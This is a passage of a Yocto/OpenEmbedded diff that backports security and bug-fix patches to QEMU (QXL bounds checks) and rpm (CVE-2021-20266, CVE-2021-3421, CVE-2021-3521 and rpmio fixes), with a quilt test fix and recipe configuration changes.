+     return 0;
+ }
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d532e157..a65a6d64 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -107,7 +107,9 @@ static void qxl_render_update_area_unlocked(PCIQXLDevice *qxl)
+         qxl->guest_primary.resized = 0;
+         qxl->guest_primary.data = qxl_phys2virt(qxl,
+                                                 qxl->guest_primary.surface.mem,
+-                                                MEMSLOT_GROUP_GUEST);
++                                                MEMSLOT_GROUP_GUEST,
++                                                qxl->guest_primary.abs_stride
++                                                * height);
+         if (!qxl->guest_primary.data) {
+             return;
+         }
+@@ -222,7 +224,8 @@ static void qxl_unpack_chunks(void *dest, size_t size, PCIQXLDevice *qxl,
+         if (offset == size) {
+             return;
+         }
+-        chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id);
++        chunk = qxl_phys2virt(qxl, chunk->next_chunk, group_id,
++                              sizeof(QXLDataChunk) + chunk->data_size);
+         if (!chunk) {
+             return;
+         }
+@@ -289,7 +292,8 @@ fail:
+ /* called from spice server thread context only */
+ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+ {
+-    QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++    QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++                                      sizeof(QXLCursorCmd));
+     QXLCursor *cursor;
+     QEMUCursor *c;
+ 
+@@ -308,7 +312,15 @@ int qxl_render_cursor(PCIQXLDevice *qxl, QXLCommandExt *ext)
+     }
+     switch (cmd->type) {
+     case QXL_CURSOR_SET:
+-        cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id);
++        /* First read the QXLCursor to get QXLDataChunk::data_size ... */
++        cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++                               sizeof(QXLCursor));
++        if (!cursor) {
++            return 1;
++        }
++        /* Then read including the chunked data following QXLCursor. */
++        cursor = qxl_phys2virt(qxl, cmd->u.set.shape, ext->group_id,
++                               sizeof(QXLCursor) + cursor->chunk.data_size);
+         if (!cursor) {
+             return 1;
+         }
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index 6bc8385b..858d3e93 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -275,7 +275,8 @@ static void qxl_spice_monitors_config_async(PCIQXLDevice *qxl, int replay)
+                                           QXL_IO_MONITORS_CONFIG_ASYNC));
+     }
+ 
+-    cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST);
++    cfg = qxl_phys2virt(qxl, qxl->guest_monitors_config, MEMSLOT_GROUP_GUEST,
++                        sizeof(QXLMonitorsConfig));
+     if (cfg != NULL && cfg->count == 1) {
+         qxl->guest_primary.resized = 1;
+         qxl->guest_head0_width  = cfg->heads[0].width;
+@@ -460,7 +461,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+     switch (le32_to_cpu(ext->cmd.type)) {
+     case QXL_CMD_SURFACE:
+     {
+-        QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++        QXLSurfaceCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++                                           sizeof(QXLSurfaceCmd));
+ 
+         if (!cmd) {
+             return 1;
+@@ -494,7 +496,8 @@ static int qxl_track_command(PCIQXLDevice *qxl, struct QXLCommandExt *ext)
+     }
+     case QXL_CMD_CURSOR:
+     {
+-        QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++        QXLCursorCmd *cmd = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++                                          sizeof(QXLCursorCmd));
+ 
+         if (!cmd) {
+             return 1;
+@@ -674,7 +677,8 @@ static int interface_get_command(QXLInstance *sin, struct QXLCommandExt *ext)
+              *
+              * https://cgit.freedesktop.org/spice/win32/qxl-wddm-dod/commit/?id=f6e099db39e7d0787f294d5fd0dce328b5210faa
+              */
+-            void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id);
++            void *msg = qxl_phys2virt(qxl, ext->cmd.data, ext->group_id,
++			    sizeof(QXLCommandRing));
+             if (msg != NULL && (
+                     msg < (void *)qxl->vga.vram_ptr ||
+                     msg > ((void *)qxl->vga.vram_ptr + qxl->vga.vram_size))) {
+@@ -1494,7 +1498,8 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+ }
+ 
+ /* can be also called from spice server thread context */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id,
++                    size_t size)
+ {
+     uint64_t offset;
+     uint32_t slot;
+@@ -1994,7 +1999,7 @@ static void qxl_dirty_surfaces(PCIQXLDevice *qxl)
+         }
+ 
+         cmd = qxl_phys2virt(qxl, qxl->guest_surfaces.cmds[i],
+-                            MEMSLOT_GROUP_GUEST);
++                            MEMSLOT_GROUP_GUEST, sizeof(QXLSurfaceCmd));
+         assert(cmd);
+         assert(cmd->type == QXL_SURFACE_CMD_CREATE);
+         qxl_dirty_one_surface(qxl, cmd->u.surface_create.data,
+diff --git a/hw/display/qxl.h b/hw/display/qxl.h
+index 80eb0d26..fcfd133a 100644
+--- a/hw/display/qxl.h
++++ b/hw/display/qxl.h
+@@ -147,7 +147,8 @@ typedef struct PCIQXLDevice {
+ #define QXL_DEFAULT_REVISION QXL_REVISION_STABLE_V12
+ 
+ /* qxl.c */
+-void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id);
++void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL phys, int group_id,
++                    size_t size);
+ void qxl_set_guest_bug(PCIQXLDevice *qxl, const char *msg, ...)
+     GCC_FMT_ATTR(2, 3);
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu_4.2.0.bb b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
index 9c76144749..05449afe4e 100644
--- a/meta/recipes-devtools/qemu/qemu_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu_4.2.0.bb
@@ -24,7 +24,8 @@ do_install_append_class-nativesdk() {
 }
 
 PACKAGECONFIG ??= " \
-    fdt sdl kvm \
+    fdt sdl kvm slirp \
     ${@bb.utils.filter('DISTRO_FEATURES', 'alsa xen', d)} \
+    ${@bb.utils.filter('DISTRO_FEATURES', 'seccomp', d)} \
 "
-PACKAGECONFIG_class-nativesdk ??= "fdt sdl kvm"
+PACKAGECONFIG:class-nativesdk ??= "fdt sdl kvm slirp"
diff --git a/meta/recipes-devtools/quilt/quilt.inc b/meta/recipes-devtools/quilt/quilt.inc
index d6d06c049c..ad23b8d922 100644
--- a/meta/recipes-devtools/quilt/quilt.inc
+++ b/meta/recipes-devtools/quilt/quilt.inc
@@ -12,6 +12,7 @@ SRC_URI = "${SAVANNAH_GNU_MIRROR}/quilt/quilt-${PV}.tar.gz \
         file://Makefile \
         file://test.sh \
         file://0001-tests-Allow-different-output-from-mv.patch \
+        file://faildiff-order.patch \
 "
 
 SRC_URI_append_class-target = " file://gnu_patch_test_fix_target.patch"
@@ -30,7 +31,7 @@ EXTRA_OECONF = "--with-perl='${USRBINPATH}/env perl' --with-patch=patch"
 EXTRA_OECONF_append_class-native = " --disable-nls"
 EXTRA_AUTORECONF += "--exclude=aclocal"
 
-CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash"
+CACHED_CONFIGUREVARS += "ac_cv_path_BASH=/bin/bash ac_cv_path_COLUMN=column"
 
 # Make sure we don't have "-w" in shebang lines: it breaks using
 # "/usr/bin/env perl" as parser
diff --git a/meta/recipes-devtools/quilt/quilt/faildiff-order.patch b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
new file mode 100644
index 0000000000..f22065a250
--- /dev/null
+++ b/meta/recipes-devtools/quilt/quilt/faildiff-order.patch
@@ -0,0 +1,41 @@
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 4dfe7f9e702c85243a71e4de267a13e434b6d6c2 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Fri, 20 Jan 2023 12:56:08 +0100
+Subject: [PATCH] test: Fix a race condition
+
+The test suite does not differentiate between stdout and stderr. When
+messages are printed to both, the order in which they will reach us
+is apparently not guaranteed. Ideally this would be deterministic, but
+until then, explicitly test stdout and stderr separately in the test
+case itself. Otherwise the test suite fails randomly, which is a pain
+for distribution package maintainers.
+
+This fixes bug #63651 reported by Ross Burton:
+https://savannah.nongnu.org/bugs/index.php?63651
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+---
+ test/faildiff.test | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/test/faildiff.test b/test/faildiff.test
+index 5afb8e3..0444c15 100644
+--- a/test/faildiff.test
++++ b/test/faildiff.test
+@@ -27,8 +27,9 @@ What happens on binary files?
+ 	> File test.bin added to patch %{P}test.diff
+ 
+ 	$ printf "\\003\\000\\001" > test.bin
+-	$ quilt diff -pab --no-index
++	$ quilt diff -pab --no-index 2>/dev/null
+ 	>~ (Files|Binary files) a/test\.bin and b/test\.bin differ
++	$ quilt diff -pab --no-index >/dev/null
+ 	> Diff failed on file 'test.bin', aborting
+ 	$ echo %{?}
+ 	> 1
+-- 
+2.34.1
+
diff --git a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
index 6454785254..dc3f74fecd 100644
--- a/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
+++ b/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch
@@ -11,36 +11,39 @@ CPU thread.
 Upstream-Status: Pending [merge of multithreading patches to upstream]
 
 Signed-off-by: Peter Bergin <peter@berginkonsult.se>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
 ---
- rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++
- 1 file changed, 34 insertions(+)
+ rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 36 insertions(+)
 
 diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
 index e051c98..b3c56b6 100644
 --- a/rpmio/rpmio.c
 +++ b/rpmio/rpmio.c
-@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
  		}
  #endif
  
-+		struct rlimit virtual_memory;
-+		getrlimit(RLIMIT_AS, &virtual_memory);
-+		if (virtual_memory.rlim_cur != RLIM_INFINITY) {
++		struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY};
++		int status = getrlimit(RLIMIT_AS, &virtual_memory);
++		if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) {
 +			const uint64_t virtual_memlimit = virtual_memory.rlim_cur;
++			uint32_t threads_max = lzma_cputhreads();
 +			const uint64_t virtual_memlimit_per_cpu_thread =
-+				virtual_memlimit / lzma_cputhreads();
-+			uint64_t memory_usage_virt;
++				virtual_memlimit / ((threads_max == 0) ? 1 : threads_max);
 +			rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and "
 +			       "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread);
++			uint64_t memory_usage_virt;
 +			/* keep reducing the number of compression threads until memory
 +			   usage falls below the limit per CPU thread*/
 +			while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) >
 +			       virtual_memlimit_per_cpu_thread) {
-+				/* If number of threads goes down to zero lzma_stream_encoder will
-+				 * will return UINT64_MAX. We must check here to avoid an infinite loop.
++				/* If number of threads goes down to zero or in case of any other error
++				 * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check
++				 * for both the cases here to avoid an infinite loop.
 +				 * If we get into situation that one thread requires more virtual memory
 +				 * than available we set one thread, print error message and try anyway. */
-+				if (--mt_options.threads == 0) {
++				if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) {
 +					mt_options.threads = 1;
 +					rpmlog(RPMLOG_WARNING,
 +					       "XZ: Could not adjust number of threads to get below "
diff --git a/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
new file mode 100644
index 0000000000..9a5ebb9115
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/0001-rpmio-Fix-lzopen_internal-mode-parsing-when-Tn-is-us.patch
@@ -0,0 +1,34 @@
+From 405fc8998181353bd510864ca251dc233afec276 Mon Sep 17 00:00:00 2001
+From: Vitaly Chikunov <vt@altlinux.org>
+Date: Wed, 6 Jan 2021 23:43:41 +0300
+Subject: [PATCH] rpmio: Fix lzopen_internal mode parsing when 'Tn' is used
+
+When there is number after "T" (suggested number of threads or "0" for
+getncpus), lzopen_internal() mode parser would skip one byte, and when
+it's at the end of the string it would then parse undesired garbage from
+the memory, making intermittent compression failures.
+
+Fixes: 7740d1098 ("Add support for multithreaded xz compression")
+Signed-off-by: Vitaly Chikunov <vt@altlinux.org>
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/405fc8998181353bd510864ca251dc233afec276]
+
+---
+ rpmio/rpmio.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c
+index ed1e25140..9d32ec6d9 100644
+--- a/rpmio/rpmio.c
++++ b/rpmio/rpmio.c
+@@ -798,6 +798,7 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz)
+ 		 * should've processed
+ 		 * */
+ 		while (isdigit(*++mode));
++		--mode;
+ 	    }
+ #ifdef HAVE_LZMA_MT
+ 	    else
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
new file mode 100644
index 0000000000..f2fc47e321
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@
+From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001
+From: Demi Marie Obenour <athena@invisiblethingslab.com>
+Date: Mon, 8 Feb 2021 16:05:01 -0500
+Subject: [PATCH] hdrblobInit() needs bounds checks too
+
+Users can pass untrusted data to hdrblobInit() and it must be robust
+against this.
+
+Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15]
+CVE: CVE-2021-20266
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ lib/header.c | 48 +++++++++++++++++++++++++++++++-----------------
+ 1 file changed, 31 insertions(+), 17 deletions(-)
+
+diff --git a/lib/header.c b/lib/header.c
+index 5b09f8352..ad5b6dc57 100644
+--- a/lib/header.c
++++ b/lib/header.c
+@@ -11,6 +11,7 @@
+ #include "system.h"
+ #include <netdb.h>
+ #include <errno.h>
++#include <inttypes.h>
+ #include <rpm/rpmtypes.h>
+ #include <rpm/rpmstring.h>
+ #include "lib/header_internal.h"
+@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob)
+     return NULL;
+ }
+ 
++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl,
++				  char **emsg) {
++    uint32_t il_max = HEADER_TAGS_MAX;
++    uint32_t dl_max = HEADER_DATA_MAX;
++    if (regionTag == RPMTAG_HEADERSIGNATURES) {
++	il_max = 32;
++	dl_max = 8192;
++    }
++    if (hdrchkRange(il_max, il)) {
++	rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il);
++	return RPMRC_FAIL;
++    }
++    if (hdrchkRange(dl_max, dl)) {
++	rasprintf(emsg, _("hdr data: BAD, no. of bytes(%" PRIu32 ") out of range"), dl);
++	return RPMRC_FAIL;
++    }
++    return RPMRC_OK;
++}
++
+ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg)
+ {
+     int32_t block[4];
+@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+     size_t nb;
+     rpmRC rc = RPMRC_FAIL;		/* assume failure */
+     int xx;
+-    int32_t il_max = HEADER_TAGS_MAX;
+-    int32_t dl_max = HEADER_DATA_MAX;
+-
+-    if (regionTag == RPMTAG_HEADERSIGNATURES) {
+-	il_max = 32;
+-	dl_max = 8192;
+-    }
+ 
+     memset(block, 0, sizeof(block));
+     if ((xx = Freadall(fd, bs, blen)) != blen) {
+@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl
+ 	goto exit;
+     }
+     il = ntohl(block[2]);
+-    if (hdrchkRange(il_max, il)) {
+-	rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il);
+-	goto exit;
+-    }
+     dl = ntohl(block[3]);
+-    if (hdrchkRange(dl_max, dl)) {
+-	rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl);
++    if (hdrblobVerifyLengths(regionTag, il, dl, emsg))
+ 	goto exit;
+-    }
+ 
+     nb = (il * sizeof(struct entryInfo_s)) + dl;
+     uc = sizeof(il) + sizeof(dl) + nb;
+@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc,
+ 		struct hdrblob_s *blob, char **emsg)
+ {
+     rpmRC rc = RPMRC_FAIL;
+-
+     memset(blob, 0, sizeof(*blob));
++    if (uc && uc < 8) {
++	rasprintf(emsg, _("hdr length: BAD"));
++	goto exit;
++    }
++
+     blob->ei = (int32_t *) uh; /* discards const */
+-    blob->il = ntohl(blob->ei[0]);
+-    blob->dl = ntohl(blob->ei[1]);
++    blob->il = ntohl((uint32_t)(blob->ei[0]));
++    blob->dl = ntohl((uint32_t)(blob->ei[1]));
++    if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK)
++	goto exit;
++
+     blob->pe = (entryInfo) &(blob->ei[2]);
+     blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) +
+ 		  (blob->il * sizeof(*blob->pe)) + blob->dl;
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
new file mode 100644
index 0000000000..b1a05b6863
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3421.patch
@@ -0,0 +1,197 @@
+From 1e5b70cab83c95aa138107a38ecda75ff70e8985 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 24 Jun 2021 01:11:26 +0000
+Subject: [PATCH] Be much more careful about copying data from the signature
+ header
+
+Only look for known tags, and ensure correct type and size where known
+before copying over. Bump the old arbitrary 16k count limit to 16M limit
+though, it's not inconceivable that a package could have that many files.
+While at it, ensure none of these tags exist in the main header,
+which would confuse us greatly.
+
+This is optimized for backporting ease, upstream can remove redundancies
+and further improve checking later.
+
+Reported and initial patches by Demi Marie Obenour.
+
+Fixes: RhBug:1935049, RhBug:1933867, RhBug:1935035, RhBug:1934125, ...
+
+Fixes: CVE-2021-3421, CVE-2021-20271
+
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/d6a86b5e69e46cc283b1e06c92343319beb42e21]
+CVE: CVE-2021-3421
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ lib/package.c | 115 ++++++++++++++++++++++++--------------------------
+ lib/rpmtag.h  |   4 ++
+ 2 files changed, 58 insertions(+), 61 deletions(-)
+
+diff --git a/lib/package.c b/lib/package.c
+index 081123d84e..7c26ea323f 100644
+--- a/lib/package.c
++++ b/lib/package.c
+@@ -20,76 +20,68 @@
+ 
+ #include "debug.h"
+ 
++struct taglate_s {
++    rpmTagVal stag;
++    rpmTagVal xtag;
++    rpm_count_t count;
++} const xlateTags[] = {
++    { RPMSIGTAG_SIZE, RPMTAG_SIGSIZE, 1 },
++    { RPMSIGTAG_PGP, RPMTAG_SIGPGP, 0 },
++    { RPMSIGTAG_MD5, RPMTAG_SIGMD5, 16 },
++    { RPMSIGTAG_GPG, RPMTAG_SIGGPG, 0 },
++    /* { RPMSIGTAG_PGP5, RPMTAG_SIGPGP5, 0 }, */ /* long obsolete, dont use */
++    { RPMSIGTAG_PAYLOADSIZE, RPMTAG_ARCHIVESIZE, 1 },
++    { RPMSIGTAG_FILESIGNATURES, RPMTAG_FILESIGNATURES, 0 },
++    { RPMSIGTAG_FILESIGNATURELENGTH, RPMTAG_FILESIGNATURELENGTH, 1 },
++    { RPMSIGTAG_SHA1, RPMTAG_SHA1HEADER, 1 },
++    { RPMSIGTAG_SHA256, RPMTAG_SHA256HEADER, 1 },
++    { RPMSIGTAG_DSA, RPMTAG_DSAHEADER, 0 },
++    { RPMSIGTAG_RSA, RPMTAG_RSAHEADER, 0 },
++    { RPMSIGTAG_LONGSIZE, RPMTAG_LONGSIGSIZE, 1 },
++    { RPMSIGTAG_LONGARCHIVESIZE, RPMTAG_LONGARCHIVESIZE, 1 },
++    { 0 }
++};
++
+ /** \ingroup header
+  * Translate and merge legacy signature tags into header.
+  * @param h		header (dest)
+  * @param sigh		signature header (src)
+  */
+ static
+-void headerMergeLegacySigs(Header h, Header sigh)
++rpmTagVal headerMergeLegacySigs(Header h, Header sigh, char **msg)
+ {
+-    HeaderIterator hi;
++    const struct taglate_s *xl;
+     struct rpmtd_s td;
+ 
+-    hi = headerInitIterator(sigh);
+-    for (; headerNext(hi, &td); rpmtdFreeData(&td))
+-    {
+-	switch (td.tag) {
+-	/* XXX Translate legacy signature tag values. */
+-	case RPMSIGTAG_SIZE:
+-	    td.tag = RPMTAG_SIGSIZE;
+-	    break;
+-	case RPMSIGTAG_PGP:
+-	    td.tag = RPMTAG_SIGPGP;
+-	    break;
+-	case RPMSIGTAG_MD5:
+-	    td.tag = RPMTAG_SIGMD5;
+-	    break;
+-	case RPMSIGTAG_GPG:
+-	    td.tag = RPMTAG_SIGGPG;
+-	    break;
+-	case RPMSIGTAG_PGP5:
+-	    td.tag = RPMTAG_SIGPGP5;
+-	    break;
+-	case RPMSIGTAG_PAYLOADSIZE:
+-	    td.tag = RPMTAG_ARCHIVESIZE;
+-	    break;
+-	case RPMSIGTAG_SHA1:
+-	case RPMSIGTAG_SHA256:
+-	case RPMSIGTAG_DSA:
+-	case RPMSIGTAG_RSA:
+-	default:
+-	    if (!(td.tag >= HEADER_SIGBASE && td.tag < HEADER_TAGBASE))
+-		continue;
+-	    break;
+-	}
+-	if (!headerIsEntry(h, td.tag)) {
+-	    switch (td.type) {
+-	    case RPM_NULL_TYPE:
+-		continue;
+-		break;
+-	    case RPM_CHAR_TYPE:
+-	    case RPM_INT8_TYPE:
+-	    case RPM_INT16_TYPE:
+-	    case RPM_INT32_TYPE:
+-	    case RPM_INT64_TYPE:
+-		if (td.count != 1)
+-		    continue;
+-		break;
+-	    case RPM_STRING_TYPE:
+-	    case RPM_BIN_TYPE:
+-		if (td.count >= 16*1024)
+-		    continue;
+-		break;
+-	    case RPM_STRING_ARRAY_TYPE:
+-	    case RPM_I18NSTRING_TYPE:
+-		continue;
+-		break;
+-	    }
+-	    (void) headerPut(h, &td, HEADERPUT_DEFAULT);
+-	}
++    rpmtdReset(&td);
++    for (xl = xlateTags; xl->stag; xl++) {
++        /* There mustn't be one in the main header */
++        if (headerIsEntry(h, xl->xtag))
++            break;
++        if (headerGet(sigh, xl->stag, &td, HEADERGET_RAW|HEADERGET_MINMEM)) {
++            /* Translate legacy tags */
++            if (xl->stag != xl->xtag)
++                td.tag = xl->xtag;
++            /* Ensure type and tag size match expectations */
++            if (td.type != rpmTagGetTagType(td.tag))
++                break;
++            if (td.count < 1 || td.count > 16*1024*1024)
++                break;
++            if (xl->count && td.count != xl->count)
++                break;
++            if (!headerPut(h, &td, HEADERPUT_DEFAULT))
++                break;
++            rpmtdFreeData(&td);
++        }
++    }
++    rpmtdFreeData(&td);
++
++    if (xl->stag) {
++        rasprintf(msg, "invalid signature tag %s (%d)",
++                        rpmTagGetName(xl->xtag), xl->xtag);
+     }
+-    headerFreeIterator(hi);
++
++    return xl->stag;
+ }
+ 
+ /**
+@@ -337,7 +329,8 @@ rpmRC rpmReadPackageFile(rpmts ts, FD_t fd, const char * fn, Header * hdrp)
+ 		goto exit;
+ 
+ 	    /* Append (and remap) signature tags to the metadata. */
+-	    headerMergeLegacySigs(h, sigh);
++	    if (headerMergeLegacySigs(h, sigh,&msg))
++		    goto exit;
+ 	    applyRetrofits(h);
+ 
+ 	    /* Bump reference count for return. */
+diff --git a/lib/rpmtag.h b/lib/rpmtag.h
+index 8c718b31b5..d562572c6f 100644
+--- a/lib/rpmtag.h
++++ b/lib/rpmtag.h
+@@ -65,6 +65,8 @@ typedef enum rpmTag_e {
+     RPMTAG_LONGARCHIVESIZE	= RPMTAG_SIG_BASE+15,	/* l */
+     /* RPMTAG_SIG_BASE+16 reserved */
+     RPMTAG_SHA256HEADER		= RPMTAG_SIG_BASE+17,	/* s */
++    /* RPMTAG_SIG_BASE+18 reserved for RPMSIGTAG_FILESIGNATURES */
++    /* RPMTAG_SIG_BASE+19 reserved for RPMSIGTAG_FILESIGNATURELENGTH */
+ 
+     RPMTAG_NAME  		= 1000,	/* s */
+ #define	RPMTAG_N	RPMTAG_NAME	/* s */
+@@ -422,6 +424,8 @@ typedef enum rpmSigTag_e {
+     RPMSIGTAG_LONGSIZE	= RPMTAG_LONGSIGSIZE,	/*!< internal Header+Payload size (64bit) in bytes. */
+     RPMSIGTAG_LONGARCHIVESIZE = RPMTAG_LONGARCHIVESIZE, /*!< internal uncompressed payload size (64bit) in bytes. */
+     RPMSIGTAG_SHA256	= RPMTAG_SHA256HEADER,
++    RPMSIGTAG_FILESIGNATURES            = RPMTAG_SIG_BASE + 18,
++    RPMSIGTAG_FILESIGNATURELENGTH       = RPMTAG_SIG_BASE + 19,
+ } rpmSigTag;
+ 
+ 
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
new file mode 100644
index 0000000000..0882d6f310
--- /dev/null
+++ b/meta/recipes-devtools/rpm/files/CVE-2021-3521-01.patch
@@ -0,0 +1,60 @@
+From b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8 Mon Sep 17 00:00:00 2001
+From: Panu Matilainen <pmatilai@redhat.com>
+Date: Thu, 30 Sep 2021 09:51:10 +0300
+Subject: [PATCH] Process MPI's from all kinds of signatures
+
+No immediate effect but needed by the following commits.
+
+Dependent patch:
+CVE: CVE-2021-3521
+Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/commit/b5e8bc74b2b05aa557f663fe227b94d2bc64fbd8]
+Signed-off-by: Riyaz Khan <Riyaz.Khan@kpit.com>
+
+---
+ rpmio/rpmpgp.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/rpmio/rpmpgp.c b/rpmio/rpmpgp.c
+index ee5c81e246..340de5fc9a 100644
+--- a/rpmio/rpmpgp.c
++++ b/rpmio/rpmpgp.c
+@@ -511,7 +511,7 @@  pgpDigAlg pgpDigAlgFree(pgpDigAlg alg)
+     return NULL;
+ }
+ 
+-static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
++static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo,
+ 		const uint8_t *p, const uint8_t *h, size_t hlen,
+ 		pgpDigParams sigp)
+ {
+@@ -524,10 +524,8 @@ static int pgpPrtSigParams(pgpTag tag, uint8_t pubkey_algo, uint8_t sigtype,
+ 	int mpil = pgpMpiLen(p);
+ 	if (p + mpil > pend)
+ 	    break;
+-	if (sigtype == PGPSIGTYPE_BINARY || sigtype == PGPSIGTYPE_TEXT) {
+-	    if (sigalg->setmpi(sigalg, i, p))
+-		break;
+-	}
++        if (sigalg->setmpi(sigalg, i, p))
++           break;
+ 	p += mpil;
+     }
+ 
+@@ -600,7 +598,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ 	}
+ 
+ 	p = ((uint8_t *)v) + sizeof(*v);
+-	rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++	rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+     }	break;
+     case 4:
+     {   pgpPktSigV4 v = (pgpPktSigV4)h;
+@@ -658,7 +656,7 @@ static int pgpPrtSig(pgpTag tag, const uint8_t *h, size_t hlen,
+ 	if (p > (h + hlen))
+ 	    return 1;
+ 
+-	rc = pgpPrtSigParams(tag, v->pubkey_algo, v->sigtype, p, h, hlen, _digp);
++	rc = pgpPrtSigParams(tag, v->pubkey_algo, p, h, hlen, _digp);
+     }	break;
+     default:
+ 	rpmlog(RPMLOG_WARNING, _("Unsupported version of key: V%d\n"), version);
